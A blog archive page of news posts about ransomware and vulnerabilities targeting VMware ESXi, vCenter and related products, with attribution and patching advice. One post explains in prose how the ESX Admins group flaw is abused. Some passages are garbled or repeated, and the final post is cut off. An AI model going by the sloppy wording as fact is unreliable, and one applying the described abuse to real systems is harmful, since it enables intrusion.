Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label VMware. Show all posts
VMware Attacks
Cyber Attacks Ransom Demand ransomware attacks targeting VMware ESXi systems VMware VMware Attacks

Ransomware Groups Exploit VMware ESXi Bug for Widespread Attacks

 

Several ransomware groups have been exploiting a vulnerability in VMware ESXi hypervisors that allows them to bypass authentication and rapidly deploy malware across virtual environments. Identified as CVE-2024-37085, this bug has been assigned a “medium” severity rating of 6.8 out of 10 on the CVSS scale. The rating reflects the need for attackers to have existing permissions in a target’s Active Directory (AD) to exploit it. 

The vulnerability, identified as CVE-2024-37085, has been assigned a “medium” severity score of 6.8 out of 10 on the CVSS scale. This score reflects the fact that attackers need existing permissions in a target’s Active Directory (AD) to exploit it. However, if attackers have AD access, they can inflict substantial damage. The CVE-2024-37085 bug allows them to instantly elevate their ESXi privileges to the highest level, enabling the deployment of ransomware, data theft, lateral movement within the network, and more. 

Notably, groups such as Storm-0506 (also known as Black Basta), Storm-1175, Manatee Tempest (part of Evil Corp), and Octo Tempest (also known as Scattered Spider) have utilized this vulnerability to distribute ransomware like Black Basta and Akira. Broadcom has released a fix for the vulnerability, which is available on its website. The vulnerability arises in scenarios where organizations configure their ESXi hypervisors to use AD for user management. By default, ESXi hypervisors grant full administrative access to any member of an AD domain group named “ESX Admins.” This oversight means that an attacker with sufficient AD privileges can create an “ESX Admins” group in the targeted domain and add a user to it, thereby gaining full administrative access to the ESXi hypervisors. Alternatively, they could rename an existing group to “ESX Admins” and use one of its existing users or add a new one. 

This vulnerability is problematic because ESXi hypervisors do not validate the existence of the “ESX Admins” group when joining a domain. The membership in this group is determined by name rather than by security identifier (SID), making the exploit straightforward. An attacker only needs to create or rename a group to “ESX Admins” to exploit the vulnerability. Ransomware attacks targeting ESXi hypervisors and virtual machines (VMs) have become increasingly common, particularly since 2020, as enterprises have accelerated their digital transformation efforts and adopted modern hybrid cloud and virtualized on-premise environments. 

Virtualized environments offer hackers significant advantages, as hypervisors typically run many VMs simultaneously, making them ideal targets for widespread ransomware deployment. These VMs often host critical services and business data, making successful attacks highly disruptive. The limited visibility and protection for hypervisors from traditional security products exacerbate this issue. Hypervisors’ isolation and complexity, along with the specialized knowledge required to protect them, make it difficult for conventional security tools to monitor and safeguard the entire environment. 

Additionally, API integration limits further complicate protection efforts. To mitigate these risks, Microsoft emphasizes the importance of keeping systems up to date with patches and practicing broader cyber hygiene around critical and vulnerable assets. Ensuring that systems are patched and that cyber hygiene practices are in place can help defend against such attacks. As ransomware actors increasingly target these systems, organizations must remain vigilant and proactive in their cybersecurity measures.
Read more »
VMware ESXi
Cyber Attacks Linux Ransomware VMware VMware ESXi

Play Ransomware Group is Targeting VMWare ESXi Environments

 

Play ransomware is the latest ransomware gang to launch a specific Linux locker for encrypting VMware ESXi virtual machines. Trend Micro, whose analysts discovered the new ransomware variation, claims the locker is designed to verify whether it is operating in an ESXi environment before executing and can bypass detection on Linux systems.

"This is the first time that we've observed Play ransomware targeting ESXi environments," Trend Micro stated. "This development suggests that the group could be broadening its attacks across the Linux platform, leading to an expanded victim pool and more successful ransom negotiations."

This has been a well-known trend for years, with most ransomware organisations turning their focus to ESXi virtual machines after companies started using them for data storage and critical application hosting due to their far more effective resource management. Taking down an organization's ESXi VMs will cause significant business disruptions and outages, whereas encrypting files and backups severely limits the victims' ability to restore compromised data.

While examining this Play ransomware sample, Trend Micro discovered that the ransomware gang leverages URL-shortening services provided by a threat actor known as Prolific Puma. 

After successfully launching, Play ransomware Linux samples will search and power down all VMs discovered in the compromised environment before encrypting files (e.g., VM disc, configuration, and metadata files), inserting the.PLAY extension to the end of each file. According to Trend Micro, the encryptor will execute a specific code to shut down all running VMware ESXi virtual machines so that they can be encrypted. 

The Play ransomware emerged in June 2022, with the first victims seeking help in BleepingComputer forums. Its operators are infamous for stealing sensitive information from compromised devices, which they then use in double-extortion attempts to force victims into paying a ransom under the threat of releasing the stolen data online.

Rackspace, the City of Oakland in California, Arnold Clark, the Belgian city of Antwerp, and Dallas County are among the high-profile victims of the Play ransomware. In December, the FBI issued a joint advisory with CISA and the Australian Cyber Security Centre (ACSC) warning that the ransomware group had penetrated about 300 organisations worldwide until October 2023.
Read more »
VMware
data security Mallox malware Ransomware VMware

Unmasking the Mallox Ransomware Variant: Targeting VMWare ESXi Environments

Unmasking the Mallox Ransomware Variant: Targeting VMWare ESXi Environments

Key highlights

  • The variant specifically checks if a targeted system is running in a VMWare ESXi environment and has administrative rights. If these requirements are not met, it won’t proceed with an attack.
  • The Linux variant uses a custom shell script for payload delivery and execution, a departure from Mallox’s previous methods.
  • The adversary behind this variant is a Mallox affiliate known as “vampire,” suggesting broader campaigns with high ransom demands and extensive IT system targeting.
  • The custom shell also exfiltrates victim information to two different servers, ensuring the ransomware actors have a backup of the data.

The Mallox ransomware group

The Mallox ransomware organization is targeting VMware ESXi setups with a new Linux strain that uses a novel mechanism to transmit and execute its payload only on workstations with high-level user capabilities.

The variant, discovered by Trend Micro researchers who monitor Mallox as TargetCompany, specifically determines whether a targeted system is running in a VMware ESXi environment has administrative rights, and will not launch an attack if these conditions are not met.

Selective targeting and privileged environments

Mallox, also known as Fargo and Tohnichi, first appeared in June 2021 and claims to have infected hundreds of organizations worldwide. The group's targeted sectors include manufacturing, retail, wholesale, legal, and professional services. According to Trend Micro, the most active Mallox sites this year are in Taiwan, India, Thailand, and South Korea.

Custom Shell: Sophisticated attack

The Linux variation is the first time Mallox has been seen employing a customized shell script to deliver and execute ransomware on virtualized environments, indicating that the activity was likely intended to cause more disruption and, as a result, increase the chances of a ransom payment.

Also, the adversary responsible for wielding the variant is a Mallox affiliate known as "vampire," implying the group's involvement in "broader campaigns involving high ransom demands and expansive IT system targeting," Trend Micro's Darrel Tristan Virtusio, Nathaniel Morales, and Cj Arsley Mateo wrote in the post.

Implications

The usage of a customized shell also suggests that Mallox "has been continuously evolving to employ more sophisticated methods in its future attacks," the researchers wrote.

This freshly discovered Linux variant is consistent with the recent trend of ransomware gangs expanding their attacks to important Linux environments, potentially increasing the number of target victims.

On top of to delivery and execution, the unique shell sends the victim's information to two additional servers, allowing the ransomware perpetrators to have a backup. Mallox is reported to have used a leak site with the same name to reveal data obtained during ransomware assaults.

How does the Mallox variant work?

This current variant first examines a system to verify if the executable is executing with administrative privileges; if not, it will not continue its operation.

Following execution, the variation creates a text file named TargetInfo.txt that contains victim information and sends it to a command-and-control (C2) server, similar to the Windows version of Mallox ransomware.

The IP address used to steal this information and later execute the payload was not previously used by Mallox. According to the researchers, it is hosted by China Mobile Communications, a Chinese ISP, and was most likely hired by the threat actor for a brief period to host its malicious payload.

Data extraction strategies

The program also checks to see if the system name matches "vmkernel," indicating that the machine is running VMware's ESXi hypervisor. If that's the case, it uses its encryption process, attaching the ".locked" extension to encrypted files and dropping a ransom letter called HOW TO DECRYPT.txt. The researchers found that both the extension and the note deviate from the Windows variant.

The custom shell script used to download and execute the payload can also exfiltrate data to another server. When the ransomware completes its routine, it reads the contents of the dropped text file and uploads it to another URL

The variation also exports victim information to two distinct sites, possibly "to improve redundancy and have a backup in case a server goes offline or is compromised," the researchers stated.

After the ransomware completes its routine, the script deletes the TargetCompany payload, making it even more difficult for security to determine the full impact of the attack, complicating investigation and incident response.

Linux ESXi environment: Careful of Cyberattacks

Mallox's clever expansion of its assault activities into Linux platforms running VMware ESXi necessitates more vigilance on the part of enterprises fitting this description, according to the researchers.

The researchers proposed that enterprises implement multifactor authentication (MFA) to prevent attackers from executing lateral movement within a network.

Read more »
Vulnerability and Exploits
Chinese Hackers Cyber Hackers CyberCrime Cybersecurity Exploitation VMware Vulnerability and Exploits

Undetected Threat: Chinese Hackers' Long-Term VMware Exploitation

 


CVE-2023-34048 is a pathogen that can be exploited remotely by an attacker who has network access to execute arbitrary code remotely due to an out-of-bounds write flaw found in VMware’s DCERPC implementation, which can be tracked as CVE-2023-34048 (CVSS 9.8). 

As a result of the severity of the problem and the lack of workaround, VMware released patches for this vulnerability in October, noting that the patch was also available for versions of its products that had reached the end-of-life period (EOL). 

There has been some reported exploitation of CVE-2023-34048 in the wild since last week, according to the virtualization technology company's advisory, but it does not provide any specific details on the attacks observed. 

A zero-day vulnerability in VMware and Fortinet devices has been exploited by Chinese state-sponsored hackers named UNC3886 for years, experts have revealed, indicating that they have long exploited this vulnerability. 

Earlier this week, Mandiant issued a report alleging that a group was exploiting the vulnerability to deploy malware, steal credentials, and ultimately exfiltrate sensitive information. The security patch was released in late October of 2023, and it carries a severity rating of 9.8/10 (critical). 

The flaw is described as an out-of-bounds write flaw that can allow attackers who have access to the VirtualCenter Server to execute code remotely. Cyberspies took advantage of this to gain access to their targets' vCenter servers and to use the compromised credentials to install maliciously crafted vSphere Installation Bundles (VIBs) on ESXi hosts with VirtualPita and VirtualPie backdoors via maliciously crafted backdoors. 

Next, the attackers exploited a VMware Tools authentication bypass flaw in CVE-2023-20867 to gain access to guest virtual machines, harvest files, and exfiltrate them. Although Mandiant was not yet certain how the attackers acquired privileged access to victims' VMware servers, a VMware service crash minutes before the backdoors were deployed made it evident that the link was established by a VMware service crash, which closely coincided with the exploit of CVE-2023-34048 in late 2023.

It has been revealed by Mandiant that the zero-day attacker targeting VMware has been exploiting CVE-2023-34048 as a zero-day weaponized by them, allowing them to gain privileged access to the vCenter system, enumerate all VMware ESXi hosts and their virtual machines which they are connected to, and gain access to the vCenter server. 

Next, the adversary will be able to connect directly to the hosts by retrieving the cleartext "vpxuser" credentials for the hosts and connecting to them directly to install the malware VIRTUALPITA and VIRTUALPIE, allowing them to interact with them directly. 

As Mandiant revealed in June 2023, this paves the way for exploiting another VMware flaw, (CVE-2023-20867, CVSS score: 3.9). As a consequence, arbitrary commands can be executed on guest VMs and files can be transferred between the guest virtual machines from a compromised ESXi host using this flaw. 

As Mandiant pointed out in their analysis, the same crashes were observed in several UNC3886 intrusions that began in late 2021, suggesting the attacker had access to the vulnerability for approximately one and a half years. As well as removing the 'vmdird' core dumps from the compromised environments, the cybersecurity firm observed that they had also preserved the log entries to cover their tracks. 

With the release of the 8.0U2 update from VMware, the vulnerability found in vCenter version 8.0U2 has been patched. The patches are available for vCenter Server versions 8.0U1, 7.0U3, 6.7U3, 6.5U3, VCF 3.x, as well as Async vCenter Server Versions 5.x and 4.x.
Read more »
Windows
Ad Blockers Data Breach Linux Phishing Attacks Ransomware Attacks. Software VMware Windows

Abyss Locker Ransomware Targets VMware ESXi Servers on Linux

The infamous Abyss Locker ransomware has surfaced as a significant threat to Linux users, primarily targeting VMware ESXi servers. This is worrying news for cybersecurity experts and server managers. Security experts are concerned about this ransomware's potential damage to vital server infrastructure.

According to reports from reliable sources, the Linux version of Abyss Locker is specifically made to take advantage of vulnerabilities in VMware ESXi servers, which are frequently used in data centers and enterprise settings.

Targeted servers are thought to be accessed by ransomware using well-known security flaws, frequently made possible by incorrect setups or unpatched software. Upon entering the system, Abyss Locker employs encryption algorithms to secure important files and databases, making them unavailable to authorized users of the server.

Cybersecurity news source BleepingComputer stated that "Abyss Locker demands a substantial Bitcoin ransom, and the threat actors behind the attacks have set a strict deadline for payment." If the instructions are not followed within the allotted time, the encrypted data may be permanently lost or the ransom price may rise."

The appearance of the Linux variant indicates a change in the strategies used by ransomware developers. Historically, ransomware attacks have primarily targeted Windows-based computers. This new discovery, however, suggests that there is increasing interest in breaking into Linux-based servers, which are frequently used to host important websites, databases, and apps.

Experts and researchers in security are hard at work examining the behavior of ransomware to identify any vulnerabilities that might help in the creation of decryption software or defense mechanisms. They encourage businesses to lower their vulnerability to these kinds of attacks by keeping their software up to date, installing security patches as soon as possible, and adhering to recommended server hardening procedures.

The main emphasis should be on prevention rather than reaction, as is the case with many ransomware strains. An organization's capacity to repel ransomware attacks can be greatly increased by putting strong security measures in place, backing up data often, and implementing intrusion detection systems.

The scenario is obviously worrying, but it also emphasizes how constantly changing cyber threats are. It is a clear reminder that businesses need to be proactive and watchful in protecting their systems from the newest threats and weaknesses.

To keep ahead of attackers, the cybersecurity community keeps in touch and exchanges information. Affected firms should implement security best practices and notify law enforcement authorities, such as local law enforcement or national cybersecurity authorities, of any ransomware attacks.

Read more »
Vulnerability
Cyber Attacks Cyberfrauds Cybersecurity Hacking Linux Encryptor Ransomwares VMware Vulnerability

ESXi Servers are Targeted by Linux-Based Akira Ransomware

 


As part of a ransomware operation called Akira, VMware ESXi virtual machines have been encrypted using a Linux encryption tool. This is to block access to the virtual machines. The attack comes after the company targeted Windows systems for a couple of months. 

To encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide, the Akira ransomware operations use a Linux encryptor to encrypt VMware ESXi virtual machines controlled by VMware. 

There has been a recent expansion of the Akira ransomware and it now targets VMware ESXi virtual machines using a Linux encryptor. It is because of this adaptation that Akira can now attack companies across the globe. 

This ransomware virus, Akira, was found in March 2023. As the most recent addition to the ransomware landscape, it is relatively less well-known. 

In the short time that Akira ransomware has been in operation, it has been confirmed that 45 organizations have been affected. Most of the targets are based in the U.S. Organizations affected range from childcare centers to large financial institutions but all have been affected. 

The threat actors are engaged in double extortion attacks against their victims, demanding several million dollars and stealing data from breached networks, encrypting files, and encrypting the data until they reach the point of demanding payouts.

In addition to asset managers, the gang's blog lists several victims of the gang's crimes. Akira will encrypt the files of an organization after an attack has been launched, appending the name of the encrypted files to the file names. The desktop screen will display a ransom note, explaining in a condescending tone that it is the quickest way back to the state where the company functions normally if you pay the ransom. 

The Development Bank of Southern Africa and London Capital Group are completely aware of the damage they have caused. There are many US-based companies on the gang's black web blog. 

This computer virus, known as Akira, uses double extortion techniques to pressure its victims into paying a ransom. This means that Akira copies the data before encrypting it to make sure the information can not be released, as well as selling the description key, and using these techniques to force a company into paying the ransom. 

In some cases, the ransoms amount to more than a million dollars, while in others it is less. It has focused on professional services, education, manufacturing, and research and development so far.

In sectors as diverse as education and finance, the threat of ransomware has disrupted corporate networks and encrypted stolen data from breached networks. These compromised files are marked with the extension .akira, which signifies compromise. 

It is important to note that, after the Akira ransomware has been activated, many different file extensions and names will become encrypted, as well as renamed files with the .akira extension. There will also be a ransom note titled akira_readme.txt left in each folder on the encrypted device. 

It is possible to customize how Akira works on Linux, which includes specifying the percentage of data that will be encrypted on each file, which allows threat actors to better customize their attacks. The propensity of this version of Akira to skip folders and files that are usually associated with Windows seems to indicate that it has been ported from the Windows version of the game.

Despite Akira's increasing scope, the fact that the threat now faces organizations around the world illustrates the urgency of action. Sadly, ransomware groups are increasingly expanding their operations to include Linux platforms as well. Many of them are leveraging readily available tools to do so due to the trend toward expanding their operations. To maximize their profits, they have turned this strategy into a simple and lucrative one. 

Among the most notable ransomware operations, some of which predominantly target VMware ESXi servers with their ransomware encryptors, include Royal, Black Basta, LockBit, BlackMatter, AvosLocker, HelloKitty, RansomEXX, and Hive. These operations use Linux-based encryption methods. 

Spreads Rapidly, is Widely Popular, and is Unsecured 

During a ransomware attack, servers are popular due to their ability to spread ransomware rapidly. Hackers need only one run to launch the ransomware attack, which means the ransomware attack becomes extremely fast for the first time in history. ESXi servers have gained popularity in the enterprise world, as they are among the most widely used hypervisors on the planet. Lastly, the devices do not have any security solutions installed on them, which leads to a lack of security. CrowdStrike published a report previously that focused on the fact that antivirus software simply isn't supported by the manufacturer. 

During the weekend of February 2-6, ESXi servers were targeted by thousands of attacks taking place simultaneously. The attackers were able to exploit an outdated vulnerability that had existed two years ago. As a result, good cyber security for servers is very important because research can take a long time and is not always easy. A problem that had not yet been exploited massively had been discovered by Mandiant in 2022, but the problem was still unknown.
Read more »
VMware ESXi
Cyber Security IoT devices Linux Security Online Safety Operating system Server Hack VMware VMware ESXi

Here's Why Cybercriminals are Targeting Linux Operating Systems

 

Internal strife is common among ransomware gangs. They argue, they fight, and they establish allies only to rapidly break them. Take, for instance, the leak of malware code from Babuk, which was compromised in 2021 by hackers enraged at being duped by the infamous ransomware gang. 

The outcomes of this intramural warfare are frequently fruitful for cybersecurity experts. Ten other ransomware gangs used the code to attack VMware and ESXI servers after that, and a number of versions were produced that researchers have been busy updating ever since. 

However, what made this particular family of malware noteworthy was that it specifically targeted Linux, which has quickly become a favourite of developers working on creating virtual machines for cloud-based computer systems, hosting for live websites, or IoT devices. With an estimated 14 million internet-facing gadgets, 46.5% of the top million websites by traffic, and an astounding 71.8% of IoT devices using Linux on any one day, its use has increased significantly in recent years. 

That's excellent news for advocates of open-source software development, for whom Linux has always served as an illustration of what can be accomplished when coding communities work together without being constrained by anything as odious as a corporate culture or a profit motivation. 

It's also really alarming for some cybersecurity specialists. Not only is there a significant dearth of ongoing research into the security of Linux-based systems in comparison to those based on more mainstream operating systems, but there is also no official, overarching method for patching the vulnerabilities in this OS. Instead, as befits an open-source product, 'flavours' of Linux are patched on an ad hoc basis by developers with time and intellect to spare - a valuable resource in the face of a real tsunami of cybercrime. Attackers are taking note. AtlasVPN discovered over 1.9 million new malware threats last year, representing a 50% rise year on year.

Shifting trend 

It wasn't always like this. Bharat Mistry recalls a time when hackers were more interested in cracking open old Windows computers. "I believe cybercriminals stayed away because they believed the popularity wasn't there," says Trend Micro's technical director for the UK and Ireland. Linux had a reputation for being secure by design, with reduced default access levels and other characteristics designed to hinder the easy spread of malware. "But over the last six years, certainly with cloud usage, it's [usage has] exponentially grown," says Mistry, increasing the amount of possible vulnerabilities. 

According to Mistry, this is largely due to the fact that it offers a cheap and cheerful alternative to the dominant OS brands, with many different flavours of unlicensed Linux accessible. "When you look at things like web servers that are hosted in the cloud, [why] should I pay for a Windows licence?" Mistry asks, speaking from the perspective of a savvy, money-conscious company. A Linux alternative is "as cheap as chips and does exactly what I need it to do." I can install Apache on it... and have the performance I want without the extra cost." 

Unfortunately, if an operating system is designed and maintained according to open source principles, hackers looking to exploit it can simply source it on GitHub and other software forums. Ensar Seker, for one, is concerned about the consequences for the use of virtual machines (VMs) in the cloud. "Virtual machines often lack the same level of security monitoring as physical systems, making it easier for attackers to go undetected for a longer period of time," says the chief information security officer at digital risk protection platform SOCRadar. 

The fact that the vast majority of software on IoT devices is based on Linux should also be cause for concern, according to the researcher, especially considering the rate of development expected for the smart device market over the next decade. More concerningly, Mistry continues, "we're seeing Linux being used more and more in critical systems," owing to how easy it is to branch and customise variants of the OS to suit particular jobs compared to its mainstream counterparts.

Given hackers' access to the source code of the operating system, malware designed to break open-source versions of these systems is frequently created to a higher standard than its Windows-targeting counterparts. It's also popular among a wide range of cybercriminal gangs. Tilted Temple, a Chinese cyber group, has utilised Linux-based malware to infiltrate important national infrastructure on three continents. 

Major players in the cybercriminal underworld, such as Black Basta, Lockbit, and Hive, have all been identified as deploying targeted Linux-chomping malware to breach online infrastructure. Another such gang, RTM, has been found on dark web forums as trading in harmful, Linux-targeting software. 

It's unclear how prepared cybersecurity providers are for this new threat. After all, until recently, these companies spent far more time fixing vulnerabilities in more widespread operating systems. Far fewer have investigated how vulnerable Linux systems can be to hacking - a squandered opportunity, according to Mistry. "Everyone's been so focused on Windows over the last few years because it's been the predominant operating system that all enterprises use," he explains. "But, in the background, Linux has always been there." 

Future threats 

Mistry does not believe the current wave of Linux attacks will abate anytime soon. He feels it will be some time before consumers and developers become aware of the risks and alter their behaviours. "The vulnerabilities in Linux platforms are massive," Mistry adds. "No one is actively controlling the vulnerabilities and patching them on a daily basis." 

Does this imply that its open-source framework contributes directly to Linux's lack of security? Certainly less, says Mistry. "You've got the openness, you've got the mass flexibility - the problem is when it comes to support," explains Mistry. 

Organisations developing new software on Linux should educate themselves on the trade-offs involved in adopting the operating system. The communities of developers modifying and patching this or that variant of Linux have "got people who will do things, but there's no kind of set body to say, 'This is the kind of direction we're going [in.]," adds Mistry, let alone any built-in regime mandating security standards. As a result, firms would be advised, according to the TrendMicro researcher, to install their own regime or create a viable audit trail for products built on some of the more unusual varieties of Linux. 

So, are the days of Linux as a popular OS alternative numbered? Probably not in the short term, and many cybersecurity vendors are becoming aware of the threat posed by Linux-based systems, according to Mistry. Nonetheless, according to Seker, each new security event involving Linux-targeting malware only serves to erode its reputation as an economical, secure, and open-source alternative to the monolithic Windows and iOS. "Even a single high-profile incident can quickly change a perception if the security community does not respond to threats promptly and effectively," he says.
Read more »
VMware
CERT CISA & FBI CVE vulnerability Encryption malware Patch Fix Ransomware Attacks. VMware

Ransomware Targeting VMware ESXi Servers Rises

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have released a joint advisory warning about an ongoing ESXiArgs ransomware campaign targeting unpatched and out-of-service or out-of-date versions of the VMware ESXi hypervisor for virtual machines (VMs).

The OpenSLP service contains a heap overflow bug that can be exploited by unverified threat actors in simple attacks. This security hole is identified as CVE-2021-21974 on the CVE database. 3,800 VMware ESXi servers around the world have reportedly been compromised, potentially rendering any running VMs useless, as per CISA.

Application of the patch as soon as feasible is strongly advised by CERT-FR, but it also says that systems that are not patched should be checked for indicators of compromise.

Although it has since moved to North America, the ESXiArgs ransomware appears to have begun attacking servers in Europe around February 3. Organizations should isolate impacted servers, reinstall ESXi 7. x or ESXi 8. x in a supported version, and apply any patches, according to the French computer emergency response team (CERT).

Updated ESXiArgs Ransomware

On infected ESXi hosts, the ransomware encrypts files with the. vmxf,.vmx,.vmdk,.vmsd, and. nvram extensions and produces a.args file for each encrypted document with metadata.

The research shows that ESXiArgs is based largely on stolen Babuk source code, which has previously been used by other ESXi ransomware attacks, including CheersCrypt and the PrideLocker encryptor from the Quantum/Dagon group. It is unclear whether this is a new variety or simply a shared Babuk codebase because the ransom notes for ESXiArgs and Cheerscrypt are quite similar but the encryption technique is distinct.

CISA and FBI urged owners of VMware ESXi servers to upgrade them to the most recent version, harden ESXi hypervisors by turning off the SLP service and make sure the ESXi hypervisor is not accessible through the open internet.

Read more »
ZDI
Bugs Cyberattacks Cybersecurity VMware Vulnerabilities and Exploits ZDI

Specifically, Targeted VMware RCE Vulnerabilities

 


As of today, VMware's vRealize Log Insight platform is vulnerable to three security vulnerabilities, that have been exposed by publicly available exploit code. This has enabled cybercriminals to weaponize these vulnerabilities in a variety of ways. Several critical unauthenticated remote code execution (RCE) bugs have been found. 

In the vRealize Log Insight platform, VMware claims that the platform is moving forward under the name Aria Operations, which provides intelligent log management for infrastructures and applications "in any environment," VMware states. In addition to offering IT departments visibility across physical, virtual, and cloud environments, dashboards and analytics are also able to be extended by third parties. This is done through the use of third-party extensions. 

This platform is typically incorporated into an appliance and can gain access to sensitive areas of an organization's IT infrastructure across a wide range of devices. 

Once an attacker has gained access to the Log Insight host, he could exploit some interesting features depending on the type of application he integrates with. This is according to Horizon.ai researcher James Horseman, who examined the publicly available exploit code. Often, the ingested logs may include sensitive information from other services. This includes session tokens, API keys, and personally identifiable information, all of which can be gathered during an attack. Having acquired keys and sessions on one system, one could pivot to another. This would enable one to further compromise the system by obtaining the key and session from the other system. 

As a result, according to Dustin Childs, chief executive officer of Trend Micro's Zero Day Initiative (ZDI), the organization responsible for disclosing the vulnerabilities, organizations need to be aware of the risks associated, particularly since these bugs and their accessibility are low barriers to exploitation. 

This type of centralized log management tool can be used in an enterprise to do centralized log management. However, using this tool for this type of centralized log control poses a substantial risk for the enterprise. This is because VMware recommends that the patch be tested and deployed as quickly as possible after it has been received by you. 

VMware vRealize Log Insight Bugs: An In-Depth Look 

According to the original VMware advisory, both critical issues carry severity scores of 9.8 out of 10. As a result, malicious actors may be able to inject files into an impacted appliance's operating system. This could result in remote code execution if an unauthenticated, malicious actor can perform such a task. 

A first-case vulnerability (CVE-2022-3172) allows an attacker to traverse a directory, which is the most serious vulnerability; a second-case vulnerability (CVE-2022-31704) allows an attacker to exploit some issues with access control. 

As for the third flaw, it is a denial of service vulnerability that is less likely to trigger a denial of service due to its risk of being exploited by an unauthenticated malicious actor (CVE-2022-31710, CVSS 7.5), which could allow an unauthenticated malicious actor to remotely trigger a denial of service. 

Creating a Bug Chain to Facilitate a full Takeover of a System

It was revealed by researchers at Horizon.ai that the three exploit issues could have been chained together after they identified the code in the wild. This led VMware to update its advisory today as a result. 

As Horseman wrote, it is apparent that this particular vulnerability chain [combined] can be exploited very easily. However, he added that it requires some kind of infrastructure setup to serve malicious payloads to the attacker. There is an issue with this vulnerability that allows remote code execution as root, which means an attacker can take full control of a computer by exploiting this vulnerability. 

However, he did point out that the product is intended for use in an internal network. There were 45 cases out there in which the appliances were discovered to be publicly exposed on the internet based on Shodan data. Despite that, it should be noted that the chain can be used both internally and externally. 

"It's very likely that the attacker already has a foothold somewhere else on the network by the time they target this product since this product is not likely to be exposed to the Internet," he noted. To determine if there has been any damage caused by an attacker, additional investigation is necessary.

The virtualization giant released a cache containing the three vulnerabilities last week as part of a larger cache that contained one other weakness. A medium-severity vulnerability that has the potential to enable data harvesting without authentication (CVE-2022-31711, CVSS 5.3) is another weakness. Currently, there is no public exploit code for the latter, but that could change shortly, especially since cybercriminals are becoming increasingly interested in VMware's offerings. 

Likely, other issues could also be exploited in a variety of ways in the future. To prove that the vulnerabilities exist, ZDI's children claim that they have proof-of-concept code available. The researchers did not think it would be a surprise if others were able to come up with an exploit quickly. 

What are the Best Practices for Protecting an Enterprise? 

Admins should apply VMware's patches to their organizations as soon as possible to ensure that their organizations are protected, or use another workaround recommended by VMware. A recent release by Horizon.ai has also enabled organizations to track the progress of any attacks by publishing indicators of compromise (IoCs). 

The key to ensuring that your log data is protected is to make sure that you are using either vRealize or Aria Operations for centralized log management, Childs advises. Aside from patching, which should be the first step, there are other things to consider. These include whether it is connected to the Internet and whether there is an IP restriction on who can access the platform. Furthermore, it reminds us that every tool or product within an organization is a potential target for an attacker to gain a foothold.   
Read more »
Vulnerabilities and Exploits
FCEB OpenSSL Supply Chain VMware Vulnerabilities and Exploits

Concerns About Supply Chain Risks Need Strategies

 


It is common for the security industry to get disturbed when new vulnerabilities are discovered in software. Two new vulnerabilities were reported in OpenSSL in late October and early November 2022, which overwhelmed news feeds. This never-ending vulnerability cycle begins with the discovery and disclosure of vulnerabilities. The impact of a cyber-attack is felt acutely by those who work on the front lines of information technology, as the need for remediation is harsh. 

To filter some of the noise from new vulnerabilities, consider the impact on supply chains and take the necessary steps to secure their assets, security leaders must maintain an effective cybersecurity strategy. 

Supply Chain Attacks Aren't Going Away 

There have been several severe vulnerabilities in Log4j, Spring Framework, and OpenSSL components in the last year which have caused us to lose significant amounts of data. As long as implementations are misconfigured or rely on known vulnerable dependencies, it is also certain those older vulnerabilities will be exploited in the future. It was learned in November 2022 that a state-sponsored Iranian operation had been mounted against the Federal Civilian Executive Branch (FCEB), which was attributed to an attack campaign launched against it by the Iranian regime. In this case, a United States federal entity ran VMware Horizon infrastructure. This infrastructure contained the Log4Shell vulnerability, which was the initial attack vector. This vulnerability allowed an attacker to gain access to the network. There was a series of attacks on FCEB. This attack chain included lateral movements, credential compromises, system compromises, network persistence, endpoint protection bypasses, and crypto-jacking in the course of a single attack. 

After security incidents involving vulnerable packages like OpenSSL or Log4j, organizations are likely to wonder why they are consuming open-source software at all. According to a recent report, supply chain attacks continue to be on the rise because suppliers and partners are reusing components. 

Instead of building systems from scratch, the team of strategic planners for cybersecurity at Sysdig repurposes existing code. As a result, engineering effort will be reduced, operational scalability will be achieved, and delivery will be fast. In general, open-source software (OSS) has a high reputation for reliability due to the public scrutiny it receives due to its open-source nature. Software is, of course, a constantly changing field, and problems can arise as a result of coding errors or dependency problems. Moreover, the improvement of testing and exploitation techniques also enables the discovery of new issues over time. 

Supply Chain Vulnerabilities: How to Address Them

To secure the modern design of an organization, it must have the appropriate tools and processes in place. In this rapidly changing environment, traditional approaches based on vulnerability management or point-in-time assessments cannot be relied upon alone. Even though these approaches may still be permitted by regulations, they perpetuate the division between "secure" and "compliance." Most organizations aim to reach some level of maturity in DevOps. There are several characteristics of DevOps practices that are common to both continuous and automated processes. Processes related to security should not be different from other processes. The security strategist must ensure that they maintain a steady focus on security throughout the phases of development, testing, and deployment, and during runtime. 

Continuously scan code in CI/CD: In addition to following the best security practices (e.g., shift left), you need to recognize that you will not be able to scan all the code and nested code. Several factors can limit the success of shift-left approaches scanner effectiveness, correlation of scanner output, automation of release decisions, and scanner completion within the release timeframes. Using the right tool can help you prioritize the risks associated with your findings. Your architecture may not be able to exploit all found vulnerabilities, and some vulnerabilities may not be exploitable in the first place. 

Continuous scanning during delivery: it is essential to prevent component compromises and environment drifts from happening. The digital supply chain, which is the process by which applications, infrastructure, and workloads are sourced from registries, and repositories, and booted up from them, need to be scanned in case something has been compromised along the way. 

Continually scan at runtime: To protect against cyber threats, most organizations are looking to continually scan at runtime, and security monitoring is the backbone of their efforts. As part of your system architecture, you need mechanisms to collect, correlate, and interpret telemetric data from all types of systems, including cloud environments, containers, and Kubernetes deployments. Insights collected during the runtime should feed back into the earlier stages of the build and delivery process. In the context of identity and services, there is an interaction between them.

Secure strategy and cybersecurity preparedness are essential in the wake of the latest OpenSSL vulnerability and Log4Shell. CVE-IDs are merely identifiers of vulnerability issues that are known to exist in publicly available software or hardware. Many vulnerabilities remain unreported, particularly those rooted in undocumented code or those resulting from environmental misconfiguration or homegrown code. Modern designs are based on distributed and diverse technologies, and cybersecurity strategies must take this into consideration. The technology you need to manage vulnerabilities requires a modern tool that uses runtime insights so that engineering teams can prioritize remediation tasks based on the information they have. Additionally, for you to avoid sudden attacks, you need to have the ability to detect and respond to threats across a wide range of environments.
Read more »
Workspace ONE Assist
Application Security Citrix Cyber Crime VMware Workspace ONE Assist

Patch ASAP: Critical Citrix and VMware Bugs Threaten Takeover of Remote Workspaces


Critical authentication-bypass vulnerabilities in Citrix and VMware offerings are threatening devices running remote workspaces with complete takeover, the vendors warned this week. 

Given both vendors’ history of exploitation, admits are warned of prioritizing patching, alerts both disclosures prompted CISA on Wednesday. 

